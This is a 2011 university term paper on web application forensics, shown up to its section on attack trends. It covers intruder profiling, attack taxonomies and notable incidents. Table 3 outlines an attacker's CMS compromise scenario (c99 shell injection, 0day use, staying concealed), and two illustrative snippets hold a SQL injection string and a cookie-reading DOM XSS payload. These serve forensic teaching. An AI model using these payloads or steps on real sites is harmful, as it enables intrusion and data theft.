Web Application Forensics
                  Taxonomy and Trends

                            term paper


                        Krassen Deltchev
                   Krassen.Deltchev@rub.de


                        5 September 2011




                  Ruhr-University of Bochum
Department of Electrical Engineering and Information Technology
              Chair of Network and Data Security
                       Horst Görtz Institute


     First Examiner:                       Prof. Jörg Schwenk
     Second Examiner and Supervisor:       M.Sc. Dominik Birk
Contents
 List of Figures .................................................................................................................................. 3
 List of Tables ................................................................................................................................... 3
 Abbreviations ................................................................................................................................... 4
 Abstract ............................................................................................................................................ 5
1. Introduction .................................................................................................................................. 7
   1.1. What is Web Application Forensics? .................................................................................... 7
   1.2. Limitations of this paper ....................................................................................................... 8
   1.3. Reference works ................................................................................................................... 9
2. Intruder profiles and Web Attacking Scenarios .......................................................................... 11
   2.1. Intruder profiling ................................................................................................................. 12
   2.2. Current Web Attacking scenarios ........................................................................................ 14
   2.3. New Trends in Web Attacking deployment and preventions .............................................. 15
3. Web Application Forensics ......................................................................................................... 19
   3.1. Examples of Webapp Forensics techniques ........................................................................ 23
   3.2. WebMail Forensics ............................................................................................................. 25
   3.3. Supportive Forensics ........................................................................................................... 27
4. Webapp Forensics tools .............................................................................................................. 29
   4.1. Requirements for Webapp forensics tools .......................................................................... 29
   4.2. Proprietary tools .................................................................................................................. 31
   4.3. Open Source tools ............................................................................................................... 34
5. Future work ................................................................................................................................ 39
6. Conclusion .................................................................................................................................. 41
 Appendixes .................................................................................................................................... 42
 Appendix A .................................................................................................................................... 42
 Application Flow Analysis ............................................................................................................ 42
 WAFO victim environment preparedness ...................................................................................... 44
 Appendix B .................................................................................................................................... 45
 Proprietary WAFO tools ................................................................................................................ 45
 Open Source WAFO tools ............................................................................................................. 48
 Results of the tool's comparison .................................................................................................... 49
 List of links .................................................................................................................................... 50
 Bibliography .................................................................................................................................. 52




List of Figures
Figure 1: General Digital Forensics Classification, WAFO allocation ............................................. 8
Figure 2: Web attacking scenario taxonomic construction .............................................................. 15
Figure 3: Digital Forensics: General taxonomy .............................................................................. 20
Figure 4: WAFO phases, in Jess Garcia[1] ...................................................................................... 21
Figure 5: Extraneous White Space on Request Line, in [3] ............................................................ 23
Figure 6: Google Dorks example, in [3] .......................................................................................... 24
Figure 7: Malicious queries at Google search by spammers, in [3] ................................................ 24
Figure 8: faked Referrer URL by spammers, in [3] ......................................................................... 24
Figure 9: RFI, pulling c99 shell, in [3] ............................................................................................ 24
Figure 10: Simple Classic SQLIA, in [3] ........................................................................................ 25
Figure 11: NBO evidence in Webapp log, in [3] ............................................................................. 25
Figure 12: HTML representation of spam-mail( e-mail spoofing) .................................................. 26
Figure 13: e-mail header snippet of the spam-mail in Figure 12 .................................................... 26
Figure 14: Spam-assassin sanitized malicious HTML redirection, from example Figure 12 ......... 27
Figure 15: Main PyFlag data flow, as [L26] .................................................................................... 35
Figure 16: Improving the Testing process of Web Application Scanners, Rafal Los [10] .............. 43
Figure 17: Flow based Threat Analysis, Example, Rafal Los [10] .................................................. 43
Figure 18: Forensics Readiness, in Jess Garcia [13] ....................................................................... 44
Figure 19: MS LogParser general flow, as [L16] ............................................................................ 45
Figure 20: LogParser-scripting example, as [L17] .......................................................................... 45
Figure 21: Splunk licenses' features ................................................................................................ 46
Figure 22: Splunk, Windows Management Instrumentation and MSA( ISA) queries, at WWW .. 47
Figure 23: PyFlag- load preset and log file output, at WWW ......................................................... 48
Figure 24: apache-scalp or Scalp! log file output( XSS query), as [L25] ....................................... 48




List of Tables
Table 1: Abbreviations ....................................................................................................................... 4
Table 2: A proposal for a general taxonomic approach, considering the complete WAFO description ... 11
Table 3: Example of possible Webapp attacking scenario ............................................................... 16
Table 4: Standard vs. Intelligent Web intruder ................................................................................ 17
Table 5: Web Application Forensics Overview, in [15] ................................................................... 21
Table 6: A general Taxonomy of the Forensics evidence, in [1] ..................................................... 22
Table 7: Common Players in Layer 7 Communication, in Jess Garcia [1] ..................................... 22
Table 8: Traditional vs. Reactive forensics Approaches, in [13] ..................................................... 29
Table 9: Functional vs. Security testing, Rafal Los [10] ................................................................. 42
Table 10: Standards & Specifications of EFBs, Rafal Los [10] ...................................................... 42
Table 11: Basic EFD Concepts [10] ................................................................................................ 42
Table 12: Definition of Execution Flow Action and Action Types, Rafal Los [10] ........................ 42
Table 13: TRR completion on LogParser, Splunk, PyFlag, Scalp! ................................................. 49
Table 14: List of links ...................................................................................................................... 51




Abbreviations
Anti-Virus                          AV
Application-Flow Analysis           AFA
Business-to-Business                B2B
Cloud-computing                     CC
Cloud(-computing) Forensics         CCFO
Digital Forensics                   DFO
Digital Image Forensics             DIFO
Execution-Flow-Based approach       EFB
Incident Response                   IR
Microsoft                           MS
Network Forensics                   NFO
Non-persistent XSS                  NP-XSS
NULL-Byte-Injection                 NBI
Operating System(s)                 OS(es)
Operating System(s) forensics       OSFO
Persistent (stored) XSS             P-XSS
Proof of Concept                    PoC
Regular Expression                  RegEx
Relational Database System          RDBMS
Remote File Inclusion               RFI
SQL Injection Attacks               SQLIA
Tool's requirements rules           TRR
Web Application Firewall(s)         WAF(s)
Web Application Forensics           WAFO
Web Application Scanner             WAS
Web Attacking Scenario(s)           WASC
Web Services Forensics              WSFO
Table 1: Abbreviations




Abstract

The topic of Web Application Forensics is challenging. There are not enough references discussing
this subject, especially in the scientific communities. The term 'Web Application Forensics' is often
misunderstood and mixed up with IDS/IPS defensive security approaches.
Another issue is to discern Web Application Forensics, in short Webapp Forensics, from Network
Forensics and Web Services Forensics, and in general to allocate it within the Digital/Computer
Forensics classification.
Nowadays, Web platforms are growing rapidly, not to mention the so-called Web 2.0 hype.
Furthermore, business Web applications outgrow the common security knowledge and demand a
rapid inventory of the current security best practices and approaches. The questions concerning the
automation of defensive and investigative security methods are becoming undeniably important.
In this paper we discuss taxonomic approaches to Webapp Forensics, examine trends related to this
topic, and debate the matter of automation tools for Webapp forensics.




Keywords
Web Application Security, WebMail Security, Web Application Forensics, WebMail
Forensics, Header Inspection, Plan Cache Inspection, Forensic Tools, Forensics
Taxonomy, Forensics Trends






1. Introduction

In [1], Jess Garcia gives a definition of the term 'Forensics Readiness':
“Forensics Readiness is the “art” of Maximizing an Environment's Ability to collect Credible
Digital Evidence”. We should keep this statement in mind throughout the paper. It points out
several important aspects. Foremost, forensics relies on the maximal collection of digital evidence.
If the observed environment1 is not well prepared for forensic investigation, discovering the root
cause of how the system was attacked can be complicated, inefficient in time and even
non-deterministic with respect to finding an appropriate remediation of the problem.
Another essential aspect of Forensics, as Jess Garcia puts it, is that the forensic investigation is an art.
It follows that defining fixed best practices for the proper deployment of forensic work is of limited
value. An intelligent intruder will always find drawbacks in such best-practice scenarios and try to
exploit them in order to accomplish new attacks, complete them successfully and remain concealed.
This raises the question: how can we suggest a taxonomy for forensic work if we are aware a priori
of the risks such recipes include?
In this paper we propose several general intruder strategies and a profiling of the modern Web
attacker, taking care not to compromise the universal validity of the statements we discuss. In some
cases we give examples and paradigms through references, though only for the purpose of
illustrating the statements of the current thesis.
Let us describe more precisely the matters concerning Webapp Forensics in the next section.

1.1. What is Web Application Forensics?

Web Application Forensics (WAFO) is the post mortem investigation of a compromised Web
Application (Webapp) system. WAFO considers especially attacks on Layer 7 of the ISO/OSI model.
In contrast, capturing and filtering internet protocols on-the-fly is not a concern of Webapp
forensics; such issues are, in general, the focus of Network Forensics (NFO). Nevertheless,
examining the log files of such automated tools (IDS/IPS/traffic filters/WAF etc.) supports the
proper deployment of the Webapp forensic investigation. As stated above, NFO examines these
issues concretely, which is why we discern Webapp Forensics from it, while keeping in mind the
supportive function that Network forensic tools can supply to WAFO.
Consequently, we allocate WAFO specifically within the Digital Forensics (DFO) structure, because
some main topics in DFO do not refer to Layer 7 of the ISO/OSI model; these include memory
investigations, Operating Systems Forensics investigations, secure data recovery on the physical
storage of OSes etc. Nevertheless, DFO also considers investigations of image manipulations
[L1], [L2], which in some cases can be very supportive for the proper deployment of WAFO.
Finally, we categorize WAFO as a sub-class of Cloud Forensics (CCFO) [2].
1 We assume that the reader understands the abstraction of the Webapp as a WAFO environment.


Cloud Forensics is a relatively new term in the security communities. Historically, the existence of
Web applications led in stages to Cloud Computing (CC). Considering the complexity of the Web
applications, platforms and services presented by CC, CCFO covers larger investigation areas than
WAFO. As an example, WAFO does not explicitly observe fraud on Web Services. Web Services
are covered by Web Services Forensics (WSFO), another sub-class of CCFO, and should be
categorically discerned from WAFO; please read further.
Let us illustrate the DFO taxonomic structure in the next Figure:




Figure 1: General Digital Forensics Classification, WAFO allocation

Following this short introduction of the different Computer Forensics categories, let us designate
explicitly the limitations of the paper. This serves the better understanding of the paper's exposition
and explains the absence of examples covering various exotic attacking scenarios.

1.2. Limitations of this paper

This term paper discusses Web Application Forensics, which excludes topics such as on-the-fly packet
capturing and the inspection of sensitive data carried over (security) internet protocols. Once again, it
does not cover attacks, or attacking scenarios, on layers below Layer 7 of the ISO/OSI model. For
the interested reader, a very good correlation of Layer 7 attacks and those below, concerning Web
Application Security and Forensics, can be found in [3]. In contrast to Web Services Forensics [5]
and CCFO [2], the presented paper covers only a small topic, concerning the varieties of fraud
against Web Applications:
    •   RIA (AJAX, RoR2, Flash, Silverlight et al.),


2 RoR- Ruby on Rails, http://rubyonrails.org/


    •     static Web Applications,
    •     dynamic Web Applications and Web content (.asp(x), .php, .do etc.),
    •     other Web implementations (like different CMSes), excluding research on fraud concerning
          Web Services Security or CC implementations, but explicitly Web Applications.
Due to the tight limitations of the term paper, the reader will find only a handful of illustrating
examples, which do not pretend to cover the whole variety of illustrative scenarios of Web attacking
techniques and Web Application Forensics approaches.
For the reader concerned, attacks on Layer 7 are introduced, and some of them discussed in detail,
in [4].
Furthermore, we should clarify how references are handled in this paper, with regard to their
uniformity, as follows. General knowledge is referenced by footnotes at the appropriate position.
Scientifically approved works are indexed at the end of the paper in the Bibliography, as usual.
Works that are not scientifically approved, such as video tutorials, live video snapshots of
conferences, blogs etc., are indexed in the List of links after the Appendix of this paper. We apply
this strict division of reference sources out of respect for the security scientific communities. In
addition, let us introduce some of the interesting related works dedicated to the topic of WAFO.

1.3. Reference works

An extensive approach covering the different aspects of Web Application Forensics is given in the
book “Detecting Malice” [3] by Robert Hansen3. The interested reader can find much more than
just WAFO discussions in this book, including examples of attacks on levels lower than Layer 7,
correlated to WAFO investigations, and many paradigms derived from real-life WAFO
investigations.
The unprepared reader should notice that the topics in the book discussing WAFO tools are
limited. The author points out that every WAFO investigation should be considered unique,
especially in its tactical accomplishment; therefore, favoring particular automated tools should be
considered inappropriate, please read further.
Another interesting approach is given by the SANS Institute as a Practical Assignment, covering three
notable topics: penetration testing of a compromised Linux system, a post mortem WAFO on the
observed environment, and a discussion of the legal aspects of the forensics investigation [6].
Despite the fact that this tutorial, in its Version 1.4, no longer relies on an up-to-date example, it
illustrates very important basics concerning WAFO and can still be used as fundamental reading
for further research on the WAFO topic.
BSI4, Germany, describes in the section “Forensic Toolkits” of the “Leitfaden IT-Forensik” [7], Version
1.0, September 2010, different forensic tools for automated analysis, many of them implicitly
concerning WAFO. The toolkits are compared by the following aspects:
    •     analysis of log data,

3 http://www.sectheory.com/bio.htm
4 https://www.bsi.bund.de/EN/Home/home_node.html


   •   tests concerning time consistency,
   •   tests concerning syntax consistency,
   •   tests concerning semantic consistency,
   •   log-data reduction,
   •   log-data correlation, i.e. integrating and combining different log-data sources into a
       consistent timeline, and integrating/combining events into super-events,
   •   detection of timing correlations (MAC timings) between events.
The given approaches can be related to WAFO log file analysis, which designates them as
reasonable supportive WAFO investigation methods; a minimal correlation sketch is shown below.
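To make the last two criteria more tangible, the following minimal Python sketch merges events from
several log sources into one consistent timeline; the record format and the sample values are assumed
for illustration only and are not taken from [7]:

import datetime as dt

# Assumed, simplified records: (source, timestamp, message).
events = [
    ("webserver", "2011-09-05 10:00:01", "GET /admin.php?id=1' OR '1'='1"),
    ("ids",       "2011-09-05 10:00:02", "SQLIA signature matched from 203.0.113.7"),
    ("dbserver",  "2011-09-05 10:00:03", "syntax error near ''1'='1'"),
]

def parse(ts):
    return dt.datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")

# Sorting by timestamp yields a single timeline across the log sources,
# which is the precondition for combining events into super-events.
for source, ts, message in sorted(events, key=lambda e: parse(e[1])):
    print("%s  [%-9s] %s" % (ts, source, message))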
Another tutorial giving a basic overview, which should also be considered fundamental for WAFO
research, is “Web Application Forensics: The Uncharted Territory”, presented at [8]. Although the
paper was published in 2002, it should not be hastily categorized as obsolete.
Other papers, articles and presentations concerning specific WAFO aspects complete the group of
related references for the Web Application Forensics research in this term paper. These are
referenced at the appropriate paragraphs of the paper's exposition and are not discussed
individually in this section.
Let us describe the structure of the term paper. Chapter 2 gives a taxonomic illustration of intruder
profiling and modern Web Attacking Scenarios. Chapter 3 deliberates WAFO investigation methods
and techniques in more detail and continues the discussion on the significance of a possible WAFO
taxonomy. Chapter 4 illustrates the tools supporting WAFO investigations. An important section
outlines the requirements for WAFO toolkits, pointing out the reasonable aspects for determining
the tools as either relevant or inappropriate for adequate WAFO investigations. Two major groups
of favored tools are designated: proprietary toolkits and Open Source solutions. Chapter 5 presents
the final discussion of the paper's thesis and suggestions for future work based on the topics
discussed in the former chapters. Chapter 6 deliberates the conclusion on the proposed thesis.
The Appendix provides additional information (tables, diagrams, screenshots and code snippets)
on specific topics discussed in the exposition part of the paper.
Let us proceed with the description of the Web Attacking Scenarios and (Web) intruder profiles.






2. Intruder profiles and Web Attacking Scenarios

The introduction of this thesis outlined that the scientifically approved research concerning Web
Application Forensics by the security and scientific communities should still be considered
insufficient and not well established. That is why an appropriate categorization of the different
forensic fields and the correct allocation of WAFO in the Digital Forensics hierarchy were identified
as required in the former chapter, which satisfies one of the objectives of the current paper.
For all that, this classification does not present a complete fundamental basis for further academic
research on WAFO. Therefore, we extend the abstract model concerning WAFO by introducing two
other fundamentals: the profile of the modern Web intruder, and methodologies as abstract
schemata by which current cyber (Web) attacks are accomplished.
Thus, we follow the proposed schema for describing the aspects of WAFO completely, see the
following Table:
    1. represent the Digital Forensics hierarchy and
    2. allocate the field of interest, concerning WAFO,
    3. explain the Security Model, WAFO is observing, by:
             •   designating the intruder,
             •   describing the victim environment( Webapps),
             •   specifying the fraudulent methods;
    4. demonstrate the WAFO tasks, supporting the security remediation plan

Table 2: A proposal for general taxonomic approach, considering the complete WAFO description


Along these lines, we should stress that intruders' attacks on existing Web Applications and other
Web implementations nowadays must be considered highly sophisticated. Such Web attacks are
rapidly adaptive in their variations and alternations, and in some cases precarious to sanitize
effectively. Examples of such attacks, like CSRF, compounded SQLIA and compounded CSRF, are
described in [4]. A good representative of this group is the famous Samy worm, which is still
wrongly considered to be a pure XSS attack. Another confusing example is demonstrated by the
third wave of XSS attacks, DOM-based XSS (DOMXSS) [20]. The fact that DOMXSS attacks
cannot be detected by IDS/IPS or WAF systems if the payload is carried in a part of the URL that
the Web application server does not record in its log file (such as the fragment), so that only the
primary URL prefix is logged, should be regarded as ominous. If the nature of such attacking
scenarios is fundamentally misunderstood, then it is only a matter of time until derivatives of these
attacks succeed in their further fraudulent activities on the Web.
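The following minimal Python sketch, using a purely hypothetical victim URL, illustrates why log-based
WAFO is blind to such payloads: only the request line reaches the server log, while the fragment never
leaves the client:

from urllib.parse import urlsplit

# Hypothetical DOMXSS victim URL: the payload is carried in the fragment,
# which the browser never sends to the server.
victim_url = "http://victim.example/page.html#name=<script>alert(document.cookie)</script>"

parts = urlsplit(victim_url)
query = "?" + parts.query if parts.query else ""
request_line = "GET %s%s HTTP/1.1" % (parts.path or "/", query)

print("logged by the Web server:", request_line)   # no trace of the payload
print("visible only client-side:", parts.fragment)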
The task of sanitizing a Web application compromised by CSRF is very difficult. It requires
immense efforts of reverse engineering and source code rectification within reasonable boundaries
of time and efficiency. The more general problem is that Web Applications are per se not stealthy5.
Thus, hardening a Webapp is not equivalent to hardening a local host.

5 Exceptions to this could be Intranet Webapps, which designate another class of Webapps in terms of the
  paper's definitions, where extensive intruder effort is a pre-requirement for breaking the Intranet security, and
  which are not discussed here as relevant.


In other words, the utilization of known preventive techniques, like security-through-obscurity, can
be applied to secured Intranet Web applications, admin Web interfaces, non-public FTP servers
etc., but not to commercial B2B Webapps, on-line banking, social network Web sites, on-line
magazines, WebMail applications and others. These last-mentioned applications are meant to be
used from all over the world per definition; they exist because of the huge number of their users
and customers per se. That is why securing such Web constructs is more complex and intensive. Of
course, there are basic and advanced authentication techniques applied to Web implementations,
though these do not make the Webapp stealthy for intruders. They merely apply the so-called user
restriction for accessing sensitive parts of the Web implementation. In this line of thought, pointing
out extreme cases of Web fraud, like child pornography and personal image offending issues, covers
only the tip of the iceberg of examples of Web crime. The problem is that nowadays identity theft
and speculation with sensitive personal data should no longer be categorized as exotic examples of
existing cyber crimes6 on Web platforms over the internet; such crimes are an everyday occurrence.
Social networks, social and health insurance companies strive for a more impressive Web
representation. E-Commerce platforms for daily monetary transactions are indispensable nowadays.
We should no longer consider Web 2.0 a mere hype; we should keep in mind that the former
dynamic E-commerce Web representations have become sophisticated RIA Web platforms. Such
Webapps serve the better marketing representation of the business logic of the firms, whose profit
nowadays depends on complexity, rapidly changing dynamic adaptation and more user-friendly
features for satisfying the Web customer at any time. These aspects explain the huge interest of
intruders in compromising Web applications, and furthermore Web Services as well. There is no
deterministic way to predict Web Attacking Scenarios, or the amount of damage they cause every
day.
In [3], Robert Hansen compares the intensity of Web attacks and the amount of damage they cause
to those of computer viruses. Neither of these security topics will lose the attention of the security
communities for a long period of time. Moreover, as already stated, their remediation cannot be
ascertained straightforwardly. As we know, there is no default approach for proper sanitization
against computer viruses; the same statement applies to Webapp attacking scenarios. Rather, it is a
matter of extensive 24/7/365 deployment of proper security hardening techniques and strategies,
and of their adaptive improvement. Knowing your friends is good; knowing your enemies is crucial.
Having given this conclusive explanation of the motivation of the paper, let us proceed with the
representation of modern Web fraud in detail, as follows.

2.1. Intruder profiling

Two general categories should be designated in this section: the standard intruder profile and the
profile of the intelligent intruder performing serious cyber crime, in short the intelligent intruder
profile. We use the adjective 'intelligent' for the second intruder profile quite deliberately, respecting
the fact that if we, as representatives of the security communities, claim to possess knowledge and
know-how concerning the proper deployment of our duties, this kind of intruder possesses it too,
and much more.

6 http://www.justice.gov/criminal/cybercrime/


There are also fuzzy definitions of intruders, which designate states in between the ones mentioned
above. In fact, these profiles are very agile in their representation. For example, a 'former' intelligent
intruder is better categorized as a latent one, and a motivated standard attacker should not be
disregarded: this violator could fulfil the requirements of the intelligent intruder profile at any time
with sufficient likelihood.
In the category of the standard intruder we count: script kiddies and hacker wannabes, “fans” of
YouTube or other video platforms who capture knowledge and know-how from easy how-to video
tutorials, badly configured robots and spiders, and any other kind of poorly educated, insufficiently
motivated, or insufficiently skilled daily violators. Specific to this group of intruders is the lack of
personal knowledge and know-how, and the utilization of well-known attacking techniques and
scenarios established on the Web. Such violators are ignorant of, and indifferent to, the noise7 they
produce while trying to accomplish the attacks. These features explain the deduction that a standard
attacking scenario can, with high likelihood, be sanitized with standard prevention and hardening
techniques (best practices). In cases of attacks successfully deployed along such standard scenarios,
the investigation and detection approaches can, with high likelihood, be considered standard too.
For all that, there are cases which represent attacking scenarios designated as shadow scenarios. It
is not important whether these are accomplished successfully or not at the specific time of the
attack's deployment; their purpose is to cover the deployment of the real attacking scenario. That is
why we should rather be concerned with whether these are cases of intelligent intruders' attacks.
The group of intelligent intruders includes: 'former' ethical hackers; pen testers; security
professionals who have changed sides, disrespecting their duties; and intelligently set up automated
tools for Web intrusion, such as Web scanners, Web crawlers, robots, spiders etc.
The most notable feature describing these representatives is the possession of superior independent
knowledge and know-how, furthermore patience, accuracy in the accomplishment of the attacking
scenario deployment, and the drive to learn and assimilate new know-how.
Interesting examples related to this profile are given in [3]. We should mention some types of such
intruders. Intelligent hackers are recruited by law firms to achieve a Proof of Concept (PoC) against
a targeted Web implementation. If the PoC is positive, this can alter the outcome of the legal case,
as the PoC can be used as decisive juristic evidence, in most situations in favor of the law firm
recruiting the hacker. Such intruders' attacks are difficult to detect right on time.
Furthermore, there are other cases where the damage of the accomplished attack is the determinant
alarm, after havoc has already occurred. As already stated, the sanitization of the compromised
Web Application(s) after such successful attacks is in some cases unfeasible and more often requires
sophisticated methods. Examples are CSRF-compromised Webapps, like the PDP GMail CSRF
attack8, see also [4]. Therefore, the proper deployment of Web Application Forensics investigations
constitutes a reasonable supportive part of the accurate sanitization of the compromised Webapp.
Let's mention several examples of modern Web Attacking Scenarios in the next section of
Chapter 2.

7 We should emphasize here the communication complexity and the amount of false positive attempts by the violator(s)
  in their striving to complete the intended Web attacking scenario(s). This should not be confused with the utilization
  of attacking techniques where producing communication noise is the core of the attacking strategy, like different
  DDoS implementations: Fast Fluxing SQLIA, DDoS via XSS, DDoS via XSS with CSRF etc.
8 http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/


2.2. Current Web Attacking scenarios

In May 2009, Joe McCray9 concluded in his presentation [9] on 'Advanced SQL Injection' at
LayerOne10 that classic SQLIA should no longer be categorized as a trend or as conventional.
In [4], classic SQLIA are discussed as part of the SQLIA taxonomy up to 2010. Despite that, their
categorization by Joe McCray should be respected as reasonable. This controversial issue is present
in many of the current Web attacking vectors: to achieve a complete taxonomic approach pertaining
to a concrete Webapp attacking vector, many obsolete representations of the attacking sub-classes
have to be illustrated, reflecting the real Web environment. The above-mentioned classic SQLIA
illustrate obsolete and, moreover, unfeasible attacking techniques, considering properly deployed
modern defensive methods. The main reason for this is that Web platforms are changing rapidly,
not only in their development aspects but also in the attacking and security hardening scenarios
applied to them. Most likely, an intelligent intruder will not use obsolete techniques, because of the
expected presence of Web application security protection. Detecting the deployment of obsolete
attacking scenarios on a modern Web construct can be classified as an investigation of the standard
intruder's profile. Nevertheless, this conclusion should not be underestimated, as previously
discussed; see shadow scenarios.
Let us give some interesting examples of recent successfully accomplished Web attacks.
In July 2009, a dynamic CSRF attack was accomplished against the Web platform of Newsweek [4], [L4].
The tool called MonkeyFist11, utilized for this first completely automated CSRF attack, is a
Python-based small web server configured via XML. The victim site had already been hardened by
protecting the generation of its dynamic elements with security tokens12 and strong session IDs.
For all that, this new attacking technique achieved positive results, which raises open questions
concerning the impact of the 'Sea Surfing' sleeping giant.
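For context, the class of token-based hardening the victim site relied on can be sketched as follows;
this is a minimal Python illustration with hypothetical names and keys, and the Newsweek case shows
that such protection alone did not stop the dynamically constructed CSRF requests:

import hmac, hashlib, secrets

# Minimal per-session anti-CSRF token sketch (hypothetical): the server derives
# a token from the session ID and a server-side secret, embeds it in every
# state-changing form and rejects requests that do not present a matching token.
SERVER_KEY = secrets.token_bytes(32)

def issue_token(session_id):
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def verify_token(session_id, presented):
    return hmac.compare_digest(issue_token(session_id), presented)

sid = "A1B2C3D4"
token = issue_token(sid)
print(verify_token(sid, token))     # True: legitimate form submission carries the token
print(verify_token(sid, "forged"))  # False: a naive cross-site forged request lacks it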
Another recent attack is the SQLIA against the British Navy website [L5] in November 2010, which
was only meant as a PoC by a Romanian hacker, showing that Web application security can be
broken even on such highly hardened Web implementations.
In April 2011, a mass infection by SQLIA was detected: 28,000 Web sites were compromised, and
even several Apple iTunes Store index pages were infected. The SQLIA injects a PHP script which
redirects the user to a cross-origin phishing site, pretending to deliver on-line Anti-Virus (AV)
protection. The attack is known in the security communities as the LizaMoon mass SQLIA13 [L6].
The list of such impressive Web attacking incidents could be continued, but shall not be enumerated
further in this paper. The interested reader should refer to:
     •   The Web Hacking Incidents Database14
     •   OWASP Top Ten Project15


9  http://www.linkedin.com/in/joemccray
10 LayerOne- IT- Security conference, http://layerone.info
11 http://www.neohaxor.org/2009/08/12/monkeyfist-fu-the-intro/
12 The anti-CSRF token is originally suggested by Thomas Schreiber, in 2004:
   www.securenet.de/papers/Session_Riding.pdf
13 http://blogs.mcafee.com/mcafee-labs/lizamoon-the-latest-sql-injection-attack
14 http://projects.webappsec.org/w/page/13246995/Web-Hacking-Incident-Database
15 http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project


At the end of this chapter, let us deliberate some interesting trends concerning the current Web
attacks.

2.3. New Trends in Web Attacking deployment and preventions

When discussing the deployment of Web attacks, we should consider a more realistic approach to
categorizing Web attacking vectors. As mentioned above, there are two general profiles of Web
intruders. Keeping in mind the differences in the attacks' deployment and the level of their
sophistication, it is more appropriate to discuss the accomplishment of Web Attacking Scenarios
rather than the deployment of individual Web application attacks. In such attacking scenarios,
which represent the fundamental construct, the Web attacks are denoted as execution techniques in
a given attacking setting. This allows us to define single-layer attacks, multi-layer attacks, and
special attacking sequences as specific implementations in the realization of the Web Attacking
Scenario. Such scenarios can adequately illustrate the intention of the different profiles of Web
intruders. In contrast to the intelligent Web intruder, the standard intruder tries to accomplish a
simple attacking scenario, reduced to the utilization of a particular Web attacking technique. This
Web attacking scenario represents a simple deployment construct: try (a) well-established attacking
procedure(s) and wait for result(s), no matter what.
As mentioned above, the intelligent intruder utilizes more sophisticated scenarios. Some of them
may be planned and sequentially accomplished over a long period of time, until the expected
result(s) are achieved. There are cases in which the intelligent attacker gains enough feedback from
the victim application and thus intentionally reduces the attacking scenario to the deployment of
one or a compact set of attacking techniques, which makes the scenario resemble that of the
standard intruder. Nevertheless, important aspects such as the utilization of non-standard attacking
techniques and less noise in the attacking environment clearly discern the one profile from the
other. These conclusions are extended in the chapters concerning the more detailed representation
of WAFO.
Let us illustrate the Web Attacking Scenario construction in the next Figure:




Figure 2: Web attacking scenario taxonomic construction




The proposed construct is extended in the next Table, which gives an example of a possible Web
attacking scenario:
   Example                                          Attack on well-known CMS
                                           [inject c99 shell on the CMS, as a paradigm]
   Scenario          •      What is the particular goal: PoC, ID Theft, destroying Personal Image etc.
                     •      determine the CMS version,
                     •      determine the technical implementation type: concurrent attacking, or sequentially attacking
                            of specific Webapp modules
                     •      localize the modules to be compromised: Web Front-end, RDBMS, WebMail interface,
                            News feeder etc.
                     •      if the CMS version is obsolete:
                                 • find published exploits (at best 0days16) and utilize them to gather feedback from
                                   the victim environment
                                 • keep the scanning noise as low as possible
                     •      if the version is up-to-date, utilize:
                                 • blind application scanning techniques with noise reduction, and wait for positive
                                   feedback
                                 • analyze the results and proceed with further, more specific attacking techniques
                     •      if successful, refine the attack and, if of interest, wait for the CMS admins' reaction;
                            this gives feedback on sanitization response time, efforts, utilized hardening techniques etc.
                     •      if not successful:
                                 • audit the gathered feedback
                                 • wait for newly published 0day exploits
                                 • develop a 0day(s) independently
                     •      execute the scenario sequence in a loop until the goal is achieved, with respect to:
                                 • (communication) attacking noise
                                 • and... try to stay concealed
Technique(s) (these should be ordered, or reordered, according to the attacking scenario):
    •   XSS: NP-XSS17, P-XSS
    •   SQLIA: error response SQLIA, timing SQLIA, ...
    •   CSRF
    •   CSFU
    •   particular 0day(s)
    •   ...
    •   common well-established techniques, like sniffing for open admin debugging console access
        on port 1099
Procedures (these should be ordered, or reordered, as appropriate):
    •   NP-XSS: detect dynamic modules on the Webapp; find variables to be compromised; craft the
        malicious GET request and taint the input value of the variable to be exploited; gather feedback;
        repeat the procedure till the expected results are achieved; spread the malicious link to as many
        'Confused Deputies' [4] as possible
    •   Error response SQLIA: Step 1, Step 2, ..., Step n
    •   ...


Table 3: Example of a possible Webapp attacking scenario


16 http://netsecurity.about.com/od/newsandeditorial1/a/aazeroday.htm
17 NP- XSS denotes non-persistent XSS; P-XSS abbreviates the Persistent XSS


How this maps onto the proposed profiles of modern Web intruders can be illustrated as follows:
    •   Attacking Scenario execution. Standard intruder: static, remains on the level of published and
        well-established 'Web attacks'. Intelligent intruder: highly dynamically adaptive18.
    •   Techniques. Standard intruder: static (as a comment: ... better watch it on YouTube19, see [4]).
        Intelligent intruder: could remain static, but preferably the cyber criminal adapts them according
        to the successful completion of the attacking scenario.
    •   Procedures. Standard intruder: static, “... just copy and paste”, 0day with less likelihood.
        Intelligent intruder: could be static, but preferably the intruder seeks a 0day(s).
Table 4: Standard vs. Intelligent Web intruder


Another important aspect, respecting the prevention and sanitization of successfully deployed Web
application attacking scenarios, is illustrated by Rafal Los20 in his presentation at OWASP
AppSecDC in October 2010 [10]. The main topic of his research is the Execution-Flow-Based
approach as a supportive technique for Web application security (pen-)testing. The utilization of
Web Application Scanners (WAS) is impressive in supporting the pen-testing job of the security
professional/ethical hacker, and, not to forget, of the intelligent intruder [11], [4]. Indeed, WAS can
effectively map the attacking surface of the Webapp intended to be compromised. Still, open
questions remain, such as: do WAS provide full Webapp function- and data-flow coverage, which
would yield greater feedback for a complete, detailed security audit of the Web construct? Most
pen-testers/ethical hackers do not examine which functions of the Webapp actually need to be
tested. If they do not know the functional structure and the data flow of the Web Application
exactly, how can they ensure appropriate and complete functional coverage during the pen-testing
of the Webapp?
The job of the pen-tester is to reveal exploits and drawbacks in the realization of a Web Application
before the intelligent intruder does. Consequently, the next question appears: what are the objective
parameters that designate the pen-testing job as completed and well done?
As Rafal Los states, the pen-testing of Webapps utilizing WAS nowadays still amounts to
“point'n'scan web application security”. The security researcher suggests in his presentation that a
more reasonable Webapp hardening approach is the combination of application function-/data-flow
analysis with the consequent security scanning of the observed Web implementation. A valuable
comparison between Rafal Los' indicated approach and the common security testing of Webapp(s),
outlining the drawbacks of the latter, is given in Table 9, Appendix A.

18 Respecting the current level of sanitization know-how, produced attacking noise, reactions of the security
   professionals to sanitize the particular Webapp, the specific goal for compromising the victim Webapp
19 The author of the paper does not intend to be offensive towards YouTube; nevertheless, the facts are: this on-line
   video platform is well established and popular, and there are tons of videos hosted on it concerning classic SQLIA
   derivatives, XSS derivatives etc., which can easily be found and utilized by script kiddies, hacker wannabes ...
20 http://preachsecurity.blogspot.com/


